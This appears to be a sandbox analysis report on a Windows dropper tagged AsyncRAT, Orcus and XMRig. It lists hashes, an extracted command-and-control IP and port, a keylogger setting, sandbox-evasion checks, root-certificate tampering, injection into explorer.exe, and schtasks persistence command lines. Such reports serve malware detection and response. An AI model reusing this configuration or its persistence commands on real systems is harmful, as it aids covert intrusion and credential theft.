asyncrat | f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7v20210410
submitted
17-07-2021 08:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a71f91351dc1bb57f0426080f2c03854.exe
Size

8.4MB
MD5

a71f91351dc1bb57f0426080f2c03854
SHA1

a336bd9298b0772f4d5764f695335fc7ef99755b
SHA256

f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
SHA512

dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19

Score

10^/10

asyncrat orcus xmrig newvprefinal discovery evasion miner pyinstaller rat spyware stealer

Malware Config

Extracted

Family

orcus

Botnet

NewVPREFinal

67.242.2.35:10134

Mutex

8185e643b7514e15b8dcfc7df7a8733b

Attributes

autostart_method
TaskScheduler
enable_keylogger
true
install_path
%systemroot%\lsddsds\lsdds.exe
reconnect_delay
10000
registry_keyname
lsd
taskscheduler_taskname
lsdds
watchdog_path
Temp\olsdd.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Orcus Main Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	family_orcus
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	family_orcus
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	family_orcus

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Orcurs Rat Executable 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	orcus
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	orcus
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe	orcus

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2224-354-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/2224-356-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 20 IoCs

Processes:

python.exedcbl.exeex.exeec.exepython.exefrefef.exeVu.exeObus.exedefendernottray.exetrayfontdefender.exeWindowsInput.exesihost64.exeWindowsInput.exesihost32.exelsdds.exeolsdd.exelsdds.exeolsdd.exeasasasas.exedefendernottray.exe

pid	process
1952	python.exe
1852	dcbl.exe
1700	ex.exe
288	ec.exe
1688	python.exe
1760	frefef.exe
864	Vu.exe
688	Obus.exe
2732	defendernottray.exe
3024	trayfontdefender.exe
2860	WindowsInput.exe
2892	sihost64.exe
976	WindowsInput.exe
2440	sihost32.exe
2544	lsdds.exe
2404	olsdd.exe
3032	lsdds.exe
2864	olsdd.exe
1800	asasasas.exe
1240	defendernottray.exe

Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

frefef.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion frefef.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	frefef.exe

Loads dropped DLL 16 IoCs

Processes:

a71f91351dc1bb57f0426080f2c03854.exepython.exepython.exeex.exeec.exedefendernottray.exetrayfontdefender.exeolsdd.execmd.exesihost64.exe

pid	process
2020	a71f91351dc1bb57f0426080f2c03854.exe
2020	a71f91351dc1bb57f0426080f2c03854.exe
2020	a71f91351dc1bb57f0426080f2c03854.exe
2020	a71f91351dc1bb57f0426080f2c03854.exe
1952	python.exe
2020	a71f91351dc1bb57f0426080f2c03854.exe
2020	a71f91351dc1bb57f0426080f2c03854.exe
2020	a71f91351dc1bb57f0426080f2c03854.exe
1688	python.exe
1700	ex.exe
288	ec.exe
2732	defendernottray.exe
3024	trayfontdefender.exe
2404	olsdd.exe
2468	cmd.exe
2892	sihost64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 ip-api.com

flow	ioc
7	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

frefef.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	frefef.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	frefef.exe

Drops file in System32 directory 26 IoCs

Processes:

powershell.exeObus.exepowershell.exepowershell.exetrayfontdefender.exepowershell.exepowershell.exeec.exepowershell.exeWindowsInput.exedefendernottray.exepowershell.exepowershell.exesihost64.exepowershell.exeex.exepowershell.exepowershell.exepowershell.exedefendernottray.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe	Obus.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\microsoft\telemetry\sihost32.log	trayfontdefender.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\trayfontdefender.exe	ec.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe.config	Obus.exe
File created	\??\c:\windows\system32\microsoft\telemetry\sihost32.exe	trayfontdefender.exe
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe
File created	\??\c:\windows\system32\microsoft\libs\sihost64.log	defendernottray.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\microsoft\libs\sihost64.exe	defendernottray.exe
File created	\??\c:\windows\system32\microsoft\libs\WR64.sys	defendernottray.exe
File opened for modification	\??\c:\windows\system32\defendernottray.exe	sihost64.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\defendernottray.exe	ex.exe
File opened for modification	\??\c:\windows\system32\defendernottray.exe	ex.exe
File opened for modification	\??\c:\windows\system32\trayfontdefender.exe	ec.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\system32\microsoft\libs\WR64.sys	defendernottray.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

defendernottray.exedefendernottray.exe

description	pid	process	target process
PID 2732 set thread context of 2224	2732	defendernottray.exe	explorer.exe
PID 1240 set thread context of 2664	1240	defendernottray.exe	explorer.exe

Drops file in Windows directory 3 IoCs

Processes:

Obus.exe

description	ioc	process
File created	C:\Windows\lsddsds\lsdds.exe	Obus.exe
File opened for modification	C:\Windows\lsddsds\lsdds.exe	Obus.exe
File created	C:\Windows\lsddsds\lsdds.exe.config	Obus.exe

Detects Pyinstaller 5 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\python\python.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2388 1760 WerFault.exe frefef.exe
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

frefef.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S frefef.exe

pid	pid_target	process	target process
2388	1760	WerFault.exe	frefef.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	frefef.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

frefef.exeVu.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	frefef.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Vu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Vu.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2576 schtasks.exe
2596 schtasks.exe
2904 schtasks.exe
2620 schtasks.exe
2476 schtasks.exe
2308 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1808 timeout.exe

pid	process
2576	schtasks.exe
2596	schtasks.exe
2904	schtasks.exe
2620	schtasks.exe
2476	schtasks.exe
2308	schtasks.exe

pid	process
1808	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

frefef.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	frefef.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	frefef.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

frefef.exedefendernottray.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	frefef.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	defendernottray.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	defendernottray.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	frefef.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2460 PING.EXE

pid	process
2460	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeVu.exepowershell.exeex.exepowershell.exeec.exepowershell.exepowershell.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.exeWerFault.exepowershell.exepowershell.exepowershell.exedcbl.exepowershell.exeolsdd.exelsdds.exe

pid	process
1336	powershell.exe
336	powershell.exe
1336	powershell.exe
336	powershell.exe
864	Vu.exe
864	Vu.exe
864	Vu.exe
1980	powershell.exe
1980	powershell.exe
1700	ex.exe
2212	powershell.exe
2212	powershell.exe
288	ec.exe
2356	powershell.exe
2356	powershell.exe
2020	powershell.exe
2020	powershell.exe
2492	powershell.exe
2492	powershell.exe
2776	powershell.exe
2732	defendernottray.exe
2776	powershell.exe
3024	trayfontdefender.exe
2388	WerFault.exe
2388	WerFault.exe
2388	WerFault.exe
2388	WerFault.exe
2388	WerFault.exe
2388	WerFault.exe
2388	WerFault.exe
960	powershell.exe
3008	powershell.exe
960	powershell.exe
3008	powershell.exe
864	Vu.exe
864	Vu.exe
2580	powershell.exe
2580	powershell.exe
1852	dcbl.exe
2584	powershell.exe
2584	powershell.exe
2864	olsdd.exe
2864	olsdd.exe
2544	lsdds.exe
2544	lsdds.exe
2544	lsdds.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe
2544	lsdds.exe
2864	olsdd.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

lsdds.exe

pid process

2544 lsdds.exe

pid	process
2544	lsdds.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exeVu.exepowershell.exefrefef.exepowershell.exeex.exepowershell.exeec.exepowershell.exepowershell.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.exeWerFault.exepowershell.exepowershell.exedcbl.exepowershell.exelsdds.exepowershell.exeolsdd.exeolsdd.exeexplorer.exeasasasas.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedefendernottray.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	864	Vu.exe
Token: SeDebugPrivilege	336	powershell.exe
Token: SeDebugPrivilege	1760	frefef.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	1700	ex.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	288	ec.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2732	defendernottray.exe
Token: SeDebugPrivilege	3024	trayfontdefender.exe
Token: SeDebugPrivilege	2388	WerFault.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1852	dcbl.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2544	lsdds.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2404	olsdd.exe
Token: SeDebugPrivilege	2864	olsdd.exe
Token: SeLockMemoryPrivilege	2224	explorer.exe
Token: SeLockMemoryPrivilege	2224	explorer.exe
Token: SeDebugPrivilege	1800	asasasas.exe
Token: SeDebugPrivilege	1800	asasasas.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1240	defendernottray.exe
Token: SeLockMemoryPrivilege	2664	explorer.exe
Token: SeLockMemoryPrivilege	2664	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

lsdds.exe

pid process

2544 lsdds.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

lsdds.exe

pid process

2544 lsdds.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

lsdds.exe

pid process

2544 lsdds.exe

pid	process
2544	lsdds.exe

pid	process
2544	lsdds.exe

pid	process
2544	lsdds.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a71f91351dc1bb57f0426080f2c03854.exepython.exeex.exeec.execmd.execmd.exeVu.execmd.exeObus.exe

description	pid	process	target process
PID 2020 wrote to memory of 1952	2020	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 2020 wrote to memory of 1952	2020	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 2020 wrote to memory of 1952	2020	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 2020 wrote to memory of 1952	2020	a71f91351dc1bb57f0426080f2c03854.exe	python.exe
PID 2020 wrote to memory of 1852	2020	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 2020 wrote to memory of 1852	2020	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 2020 wrote to memory of 1852	2020	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 2020 wrote to memory of 1852	2020	a71f91351dc1bb57f0426080f2c03854.exe	dcbl.exe
PID 2020 wrote to memory of 1700	2020	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 2020 wrote to memory of 1700	2020	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 2020 wrote to memory of 1700	2020	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 2020 wrote to memory of 1700	2020	a71f91351dc1bb57f0426080f2c03854.exe	ex.exe
PID 2020 wrote to memory of 288	2020	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 2020 wrote to memory of 288	2020	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 2020 wrote to memory of 288	2020	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 2020 wrote to memory of 288	2020	a71f91351dc1bb57f0426080f2c03854.exe	ec.exe
PID 1952 wrote to memory of 1688	1952	python.exe	python.exe
PID 1952 wrote to memory of 1688	1952	python.exe	python.exe
PID 1952 wrote to memory of 1688	1952	python.exe	python.exe
PID 2020 wrote to memory of 1760	2020	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 2020 wrote to memory of 1760	2020	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 2020 wrote to memory of 1760	2020	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 2020 wrote to memory of 1760	2020	a71f91351dc1bb57f0426080f2c03854.exe	frefef.exe
PID 1700 wrote to memory of 1772	1700	ex.exe	cmd.exe
PID 1700 wrote to memory of 1772	1700	ex.exe	cmd.exe
PID 1700 wrote to memory of 1772	1700	ex.exe	cmd.exe
PID 288 wrote to memory of 1120	288	ec.exe	cmd.exe
PID 288 wrote to memory of 1120	288	ec.exe	cmd.exe
PID 288 wrote to memory of 1120	288	ec.exe	cmd.exe
PID 2020 wrote to memory of 864	2020	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 2020 wrote to memory of 864	2020	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 2020 wrote to memory of 864	2020	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 2020 wrote to memory of 864	2020	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 1336	1772	cmd.exe	powershell.exe
PID 1120 wrote to memory of 336	1120	cmd.exe	powershell.exe
PID 1120 wrote to memory of 336	1120	cmd.exe	powershell.exe
PID 1120 wrote to memory of 336	1120	cmd.exe	powershell.exe
PID 2020 wrote to memory of 688	2020	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 2020 wrote to memory of 688	2020	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 2020 wrote to memory of 688	2020	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 2020 wrote to memory of 688	2020	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 1772 wrote to memory of 1980	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 1980	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 1980	1772	cmd.exe	powershell.exe
PID 864 wrote to memory of 2104	864	Vu.exe	cmd.exe
PID 864 wrote to memory of 2104	864	Vu.exe	cmd.exe
PID 864 wrote to memory of 2104	864	Vu.exe	cmd.exe
PID 2104 wrote to memory of 2196	2104	cmd.exe	chcp.com
PID 2104 wrote to memory of 2196	2104	cmd.exe	chcp.com
PID 2104 wrote to memory of 2196	2104	cmd.exe	chcp.com
PID 1120 wrote to memory of 2212	1120	cmd.exe	powershell.exe
PID 1120 wrote to memory of 2212	1120	cmd.exe	powershell.exe
PID 1120 wrote to memory of 2212	1120	cmd.exe	powershell.exe
PID 2104 wrote to memory of 2264	2104	cmd.exe	netsh.exe
PID 2104 wrote to memory of 2264	2104	cmd.exe	netsh.exe
PID 2104 wrote to memory of 2264	2104	cmd.exe	netsh.exe
PID 1772 wrote to memory of 2356	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 2356	1772	cmd.exe	powershell.exe
PID 1772 wrote to memory of 2356	1772	cmd.exe	powershell.exe
PID 688 wrote to memory of 2400	688	Obus.exe	csc.exe
PID 688 wrote to memory of 2400	688	Obus.exe	csc.exe
PID 688 wrote to memory of 2400	688	Obus.exe	csc.exe

C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe
"C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020

C:\Users\Admin\AppData\Local\Temp\python\python.exe
"C:\Users\Admin\AppData\Local\Temp\python\python.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1952

C:\Users\Admin\AppData\Local\Temp\python\python.exe
"C:\Users\Admin\AppData\Local\Temp\python\python.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1688

C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
"C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit
3⤵
PID:1240

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'
4⤵
- Creates scheduled task(s)
PID:2476

C:\Windows\SysWOW64\cmd.exe
